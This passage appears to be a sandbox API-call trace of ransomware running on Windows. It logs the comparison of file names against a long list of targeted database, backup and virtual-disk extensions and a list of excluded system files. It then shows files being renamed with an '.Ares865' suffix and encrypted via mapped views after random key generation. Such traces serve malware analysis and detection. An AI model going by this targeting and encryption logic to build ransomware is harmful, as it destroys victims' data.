returned -1 [0084.870] lstrlenW (lpString="vvv") returned 3 [0084.870] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0084.870] lstrlenW (lpString="wdb") returned 3 [0084.870] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0084.870] lstrlenW (lpString="wmdb") returned 4 [0084.870] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0084.870] lstrlenW (lpString="wrk") returned 3 [0084.870] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0084.870] lstrlenW (lpString="xdb") returned 3 [0084.870] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0084.870] lstrlenW (lpString="xld") returned 3 [0084.870] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0084.870] lstrlenW (lpString="xmlff") returned 5 [0084.870] lstrcmpiW (lpString1="1.bmp", lpString2="xmlff") returned -1 [0084.870] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp.Ares865") returned 90 [0084.870] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile21.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile21.bmp.ares865"), dwFlags=0x1) returned 1 [0084.871] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile21.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0084.871] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0084.871] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0084.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0084.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0084.872] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0084.872] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0084.872] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.873] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0084.875] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0084.878] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0084.879] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0084.879] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0084.879] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0084.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0084.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0084.879] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0084.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0084.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0084.879] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0084.879] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0084.879] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0084.879] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0084.880] CloseHandle (hObject=0x15c) returned 1 [0084.880] CloseHandle (hObject=0x118) returned 1 [0084.880] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0084.880] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0084.880] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0084.880] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3a60b9, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3a60b9, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd09009d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile22.bmp", cAlternateFileName="")) returned 1 [0084.880] lstrcmpiW (lpString1="usertile22.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0084.880] lstrcmpiW (lpString1="usertile22.bmp", lpString2="aoldtz.exe") returned 1 [0084.880] lstrcmpiW (lpString1="usertile22.bmp", lpString2=".") returned 1 [0084.880] lstrcmpiW (lpString1="usertile22.bmp", lpString2="..") returned 1 [0084.880] lstrcmpiW (lpString1="usertile22.bmp", lpString2="windows") returned -1 [0084.881] lstrcmpiW (lpString1="usertile22.bmp", lpString2="bootmgr") returned 1 [0084.881] lstrcmpiW (lpString1="usertile22.bmp", lpString2="temp") returned 1 [0084.881] lstrcmpiW (lpString1="usertile22.bmp", lpString2="pagefile.sys") returned 1 [0084.881] lstrcmpiW (lpString1="usertile22.bmp", lpString2="boot") returned 1 [0084.881] lstrcmpiW (lpString1="usertile22.bmp", lpString2="ids.txt") returned 1 [0084.881] lstrcmpiW (lpString1="usertile22.bmp", lpString2="ntuser.dat") returned 1 [0084.881] lstrcmpiW (lpString1="usertile22.bmp", lpString2="perflogs") returned 1 [0084.881] lstrcmpiW (lpString1="usertile22.bmp", lpString2="MSBuild") returned 1 [0084.881] lstrlenW (lpString="usertile22.bmp") returned 14 [0084.881] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp") returned 82 [0084.881] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile22.bmp" | out: lpString1="usertile22.bmp") returned="usertile22.bmp" [0084.881] lstrlenW (lpString="usertile22.bmp") returned 14 [0084.881] lstrlenW (lpString="Ares865") returned 7 [0084.881] lstrcmpiW (lpString1="e22.bmp", lpString2="Ares865") returned 1 [0084.881] lstrlenW (lpString=".dll") returned 4 [0084.881] lstrcmpiW (lpString1="usertile22.bmp", lpString2=".dll") returned 1 [0084.881] lstrlenW (lpString=".lnk") returned 4 [0084.881] lstrcmpiW (lpString1="usertile22.bmp", lpString2=".lnk") returned 1 [0084.881] lstrlenW (lpString=".ini") returned 4 [0084.881] lstrcmpiW (lpString1="usertile22.bmp", lpString2=".ini") returned 1 [0084.881] lstrlenW (lpString=".sys") returned 4 [0084.881] lstrcmpiW (lpString1="usertile22.bmp", lpString2=".sys") returned 1 [0084.881] lstrlenW (lpString="usertile22.bmp") returned 14 [0084.881] lstrlenW (lpString="bak") returned 3 [0084.881] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0084.881] lstrlenW (lpString="ba_") returned 3 [0084.881] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0084.881] lstrlenW (lpString="dbb") returned 3 [0084.881] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0084.881] lstrlenW (lpString="vmdk") returned 4 [0084.881] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0084.881] lstrlenW (lpString="rar") returned 3 [0084.881] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0084.881] lstrlenW (lpString="zip") returned 3 [0084.881] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0084.881] lstrlenW (lpString="tgz") returned 3 [0084.881] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0084.882] lstrlenW (lpString="vbox") returned 4 [0084.882] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0084.882] lstrlenW (lpString="vdi") returned 3 [0084.882] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0084.882] lstrlenW (lpString="vhd") returned 3 [0084.882] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0084.882] lstrlenW (lpString="vhdx") returned 4 [0084.882] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0084.882] lstrlenW (lpString="avhd") returned 4 [0084.882] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0084.882] lstrlenW (lpString="db") returned 2 [0084.882] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0084.882] lstrlenW (lpString="db2") returned 3 [0084.882] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0084.882] lstrlenW (lpString="db3") returned 3 [0084.882] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0084.882] lstrlenW (lpString="dbf") returned 3 [0084.882] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0084.882] lstrlenW (lpString="mdf") returned 3 [0084.882] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0084.882] lstrlenW (lpString="mdb") returned 3 [0084.882] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0084.882] lstrlenW (lpString="sql") returned 3 [0084.882] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0084.882] lstrlenW (lpString="sqlite") returned 6 [0084.882] lstrcmpiW (lpString1="22.bmp", lpString2="sqlite") returned -1 [0084.882] lstrlenW (lpString="sqlite3") returned 7 [0084.882] lstrcmpiW (lpString1="e22.bmp", lpString2="sqlite3") returned -1 [0084.882] lstrlenW (lpString="sqlitedb") returned 8 [0084.882] lstrcmpiW (lpString1="le22.bmp", lpString2="sqlitedb") returned -1 [0084.882] lstrlenW (lpString="xml") returned 3 [0084.882] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0084.882] lstrlenW (lpString="$er") returned 3 [0084.882] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0084.882] lstrlenW (lpString="4dd") returned 3 [0084.882] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0084.882] lstrlenW (lpString="4dl") returned 3 [0084.883] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0084.883] lstrlenW (lpString="^^^") returned 3 [0084.883] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0084.883] lstrlenW (lpString="abs") returned 3 [0084.883] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0084.883] lstrlenW (lpString="abx") returned 3 [0084.883] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0084.883] lstrlenW (lpString="accdb") returned 5 [0084.883] lstrcmpiW (lpString1="2.bmp", lpString2="accdb") returned -1 [0084.883] lstrlenW (lpString="accdc") returned 5 [0084.883] lstrcmpiW (lpString1="2.bmp", lpString2="accdc") returned -1 [0084.883] lstrlenW (lpString="accde") returned 5 [0084.883] lstrcmpiW (lpString1="2.bmp", lpString2="accde") returned -1 [0084.883] lstrlenW (lpString="accdr") returned 5 [0084.883] lstrcmpiW (lpString1="2.bmp", lpString2="accdr") returned -1 [0084.883] lstrlenW (lpString="accdt") returned 5 [0084.883] lstrcmpiW (lpString1="2.bmp", lpString2="accdt") returned -1 [0084.883] lstrlenW (lpString="accdw") returned 5 [0084.883] lstrcmpiW (lpString1="2.bmp", lpString2="accdw") returned -1 [0084.883] lstrlenW (lpString="accft") returned 5 [0084.883] lstrcmpiW (lpString1="2.bmp", lpString2="accft") returned -1 [0084.883] lstrlenW (lpString="adb") returned 3 [0084.883] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.883] lstrlenW (lpString="adb") returned 3 [0084.883] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.883] lstrlenW (lpString="ade") returned 3 [0084.883] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0084.883] lstrlenW (lpString="adf") returned 3 [0084.883] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0084.883] lstrlenW (lpString="adn") returned 3 [0084.883] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0084.883] lstrlenW (lpString="adp") returned 3 [0084.883] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0084.883] lstrlenW (lpString="alf") returned 3 [0084.883] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0084.883] lstrlenW (lpString="ask") returned 3 [0084.883] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0084.883] lstrlenW (lpString="btr") returned 3 [0084.884] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0084.884] lstrlenW (lpString="cat") returned 3 [0084.884] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0084.884] lstrlenW (lpString="cdb") returned 3 [0084.884] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0084.884] lstrlenW (lpString="ckp") returned 3 [0084.884] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0084.884] lstrlenW (lpString="cma") returned 3 [0084.884] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0084.884] lstrlenW (lpString="cpd") returned 3 [0084.884] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0084.884] lstrlenW (lpString="dacpac") returned 6 [0084.884] lstrcmpiW (lpString1="22.bmp", lpString2="dacpac") returned -1 [0084.884] lstrlenW (lpString="dad") returned 3 [0084.884] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0084.884] lstrlenW (lpString="dadiagrams") returned 10 [0084.884] lstrcmpiW (lpString1="tile22.bmp", lpString2="dadiagrams") returned 1 [0084.884] lstrlenW (lpString="daschema") returned 8 [0084.884] lstrcmpiW (lpString1="le22.bmp", lpString2="daschema") returned 1 [0084.884] lstrlenW (lpString="db-journal") returned 10 [0084.884] lstrcmpiW (lpString1="tile22.bmp", lpString2="db-journal") returned 1 [0084.884] lstrlenW (lpString="db-shm") returned 6 [0084.884] lstrcmpiW (lpString1="22.bmp", lpString2="db-shm") returned -1 [0084.884] lstrlenW (lpString="db-wal") returned 6 [0084.884] lstrcmpiW (lpString1="22.bmp", lpString2="db-wal") returned -1 [0084.884] lstrlenW (lpString="dbc") returned 3 [0084.884] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0084.884] lstrlenW (lpString="dbs") returned 3 [0084.884] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0084.884] lstrlenW (lpString="dbt") returned 3 [0084.884] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0084.884] lstrlenW (lpString="dbv") returned 3 [0084.884] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0084.884] lstrlenW (lpString="dbx") returned 3 [0084.884] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0084.884] lstrlenW (lpString="dcb") returned 3 [0084.884] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0084.884] lstrlenW (lpString="dct") returned 3 [0084.885] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0084.885] lstrlenW (lpString="dcx") returned 3 [0084.885] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0084.885] lstrlenW (lpString="ddl") returned 3 [0084.885] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0084.885] lstrlenW (lpString="dlis") returned 4 [0084.885] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0084.885] lstrlenW (lpString="dp1") returned 3 [0084.885] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0084.885] lstrlenW (lpString="dqy") returned 3 [0084.885] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0084.885] lstrlenW (lpString="dsk") returned 3 [0084.885] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0084.885] lstrlenW (lpString="dsn") returned 3 [0084.885] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0084.885] lstrlenW (lpString="dtsx") returned 4 [0084.885] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0084.885] lstrlenW (lpString="dxl") returned 3 [0084.885] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0084.885] lstrlenW (lpString="eco") returned 3 [0084.885] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0084.885] lstrlenW (lpString="ecx") returned 3 [0084.885] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0084.885] lstrlenW (lpString="edb") returned 3 [0084.885] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0084.885] lstrlenW (lpString="epim") returned 4 [0084.885] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0084.885] lstrlenW (lpString="fcd") returned 3 [0084.885] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0084.885] lstrlenW (lpString="fdb") returned 3 [0084.885] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0084.885] lstrlenW (lpString="fic") returned 3 [0084.885] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0084.885] lstrlenW (lpString="flexolibrary") returned 12 [0084.885] lstrcmpiW (lpString1="ertile22.bmp", lpString2="flexolibrary") returned -1 [0084.885] lstrlenW (lpString="fm5") returned 3 [0084.885] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0084.885] lstrlenW (lpString="fmp") returned 3 [0084.886] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0084.886] lstrlenW (lpString="fmp12") returned 5 [0084.886] lstrcmpiW (lpString1="2.bmp", lpString2="fmp12") returned -1 [0084.886] lstrlenW (lpString="fmpsl") returned 5 [0084.886] lstrcmpiW (lpString1="2.bmp", lpString2="fmpsl") returned -1 [0084.886] lstrlenW (lpString="fol") returned 3 [0084.886] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0084.886] lstrlenW (lpString="fp3") returned 3 [0084.886] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0084.886] lstrlenW (lpString="fp4") returned 3 [0084.886] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0084.886] lstrlenW (lpString="fp5") returned 3 [0084.886] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0084.886] lstrlenW (lpString="fp7") returned 3 [0084.886] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0084.886] lstrlenW (lpString="fpt") returned 3 [0084.886] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0084.886] lstrlenW (lpString="frm") returned 3 [0084.886] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0084.886] lstrlenW (lpString="gdb") returned 3 [0084.886] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.886] lstrlenW (lpString="gdb") returned 3 [0084.886] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.886] lstrlenW (lpString="grdb") returned 4 [0084.886] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0084.886] lstrlenW (lpString="gwi") returned 3 [0084.886] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0084.886] lstrlenW (lpString="hdb") returned 3 [0084.886] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0084.886] lstrlenW (lpString="his") returned 3 [0084.886] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0084.886] lstrlenW (lpString="ib") returned 2 [0084.886] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0084.886] lstrlenW (lpString="idb") returned 3 [0084.886] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0084.886] lstrlenW (lpString="ihx") returned 3 [0084.886] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0084.887] lstrlenW (lpString="itdb") returned 4 [0084.887] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0084.887] lstrlenW (lpString="itw") returned 3 [0084.887] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0084.887] lstrlenW (lpString="jet") returned 3 [0084.887] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0084.887] lstrlenW (lpString="jtx") returned 3 [0084.887] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0084.887] lstrlenW (lpString="kdb") returned 3 [0084.887] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0084.887] lstrlenW (lpString="kexi") returned 4 [0084.887] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0084.887] lstrlenW (lpString="kexic") returned 5 [0084.887] lstrcmpiW (lpString1="2.bmp", lpString2="kexic") returned -1 [0084.887] lstrlenW (lpString="kexis") returned 5 [0084.887] lstrcmpiW (lpString1="2.bmp", lpString2="kexis") returned -1 [0084.887] lstrlenW (lpString="lgc") returned 3 [0084.887] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0084.887] lstrlenW (lpString="lwx") returned 3 [0084.887] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0084.887] lstrlenW (lpString="maf") returned 3 [0084.887] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0084.887] lstrlenW (lpString="maq") returned 3 [0084.887] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0084.887] lstrlenW (lpString="mar") returned 3 [0084.887] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0084.887] lstrlenW (lpString="marshal") returned 7 [0084.887] lstrcmpiW (lpString1="e22.bmp", lpString2="marshal") returned -1 [0084.887] lstrlenW (lpString="mas") returned 3 [0084.887] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0084.887] lstrlenW (lpString="mav") returned 3 [0084.887] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0084.887] lstrlenW (lpString="maw") returned 3 [0084.887] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0084.887] lstrlenW (lpString="mdbhtml") returned 7 [0084.887] lstrcmpiW (lpString1="e22.bmp", lpString2="mdbhtml") returned -1 [0084.887] lstrlenW (lpString="mdn") returned 3 [0084.887] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0084.888] lstrlenW (lpString="mdt") returned 3 [0084.888] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0084.888] lstrlenW (lpString="mfd") returned 3 [0084.888] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0084.888] lstrlenW (lpString="mpd") returned 3 [0084.888] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0084.888] lstrlenW (lpString="mrg") returned 3 [0084.888] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0084.888] lstrlenW (lpString="mud") returned 3 [0084.888] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0084.888] lstrlenW (lpString="mwb") returned 3 [0084.888] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0084.888] lstrlenW (lpString="myd") returned 3 [0084.888] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0084.888] lstrlenW (lpString="ndf") returned 3 [0084.888] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0084.888] lstrlenW (lpString="nnt") returned 3 [0084.888] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0084.888] lstrlenW (lpString="nrmlib") returned 6 [0084.888] lstrcmpiW (lpString1="22.bmp", lpString2="nrmlib") returned -1 [0084.888] lstrlenW (lpString="ns2") returned 3 [0084.888] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0084.888] lstrlenW (lpString="ns3") returned 3 [0084.888] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0084.888] lstrlenW (lpString="ns4") returned 3 [0084.888] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0084.888] lstrlenW (lpString="nsf") returned 3 [0084.888] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0084.888] lstrlenW (lpString="nv") returned 2 [0084.888] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0084.888] lstrlenW (lpString="nv2") returned 3 [0084.888] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0084.888] lstrlenW (lpString="nwdb") returned 4 [0084.888] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0084.888] lstrlenW (lpString="nyf") returned 3 [0084.888] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0084.888] lstrlenW (lpString="odb") returned 3 [0084.888] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.889] lstrlenW (lpString="odb") returned 3 [0084.889] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.889] lstrlenW (lpString="oqy") returned 3 [0084.889] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0084.889] lstrlenW (lpString="ora") returned 3 [0084.889] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0084.889] lstrlenW (lpString="orx") returned 3 [0084.889] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0084.889] lstrlenW (lpString="owc") returned 3 [0084.889] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0084.889] lstrlenW (lpString="p96") returned 3 [0084.889] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0084.889] lstrlenW (lpString="p97") returned 3 [0084.889] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0084.889] lstrlenW (lpString="pan") returned 3 [0084.889] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0084.889] lstrlenW (lpString="pdb") returned 3 [0084.889] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0084.889] lstrlenW (lpString="pdm") returned 3 [0084.889] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0084.889] lstrlenW (lpString="pnz") returned 3 [0084.889] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0084.889] lstrlenW (lpString="qry") returned 3 [0084.889] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0084.889] lstrlenW (lpString="qvd") returned 3 [0084.889] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0084.889] lstrlenW (lpString="rbf") returned 3 [0084.889] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0084.889] lstrlenW (lpString="rctd") returned 4 [0084.889] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0084.889] lstrlenW (lpString="rod") returned 3 [0084.889] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0084.889] lstrlenW (lpString="rodx") returned 4 [0084.889] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0084.889] lstrlenW (lpString="rpd") returned 3 [0084.889] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0084.890] lstrlenW (lpString="rsd") returned 3 [0084.890] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0084.890] lstrlenW (lpString="sas7bdat") returned 8 [0084.890] lstrcmpiW (lpString1="le22.bmp", lpString2="sas7bdat") returned -1 [0084.890] lstrlenW (lpString="sbf") returned 3 [0084.890] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0084.890] lstrlenW (lpString="scx") returned 3 [0084.890] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0084.890] lstrlenW (lpString="sdb") returned 3 [0084.890] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0084.890] lstrlenW (lpString="sdc") returned 3 [0084.890] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0084.890] lstrlenW (lpString="sdf") returned 3 [0084.890] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0084.890] lstrlenW (lpString="sis") returned 3 [0084.890] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0084.890] lstrlenW (lpString="spq") returned 3 [0084.890] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0084.890] lstrlenW (lpString="te") returned 2 [0084.890] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 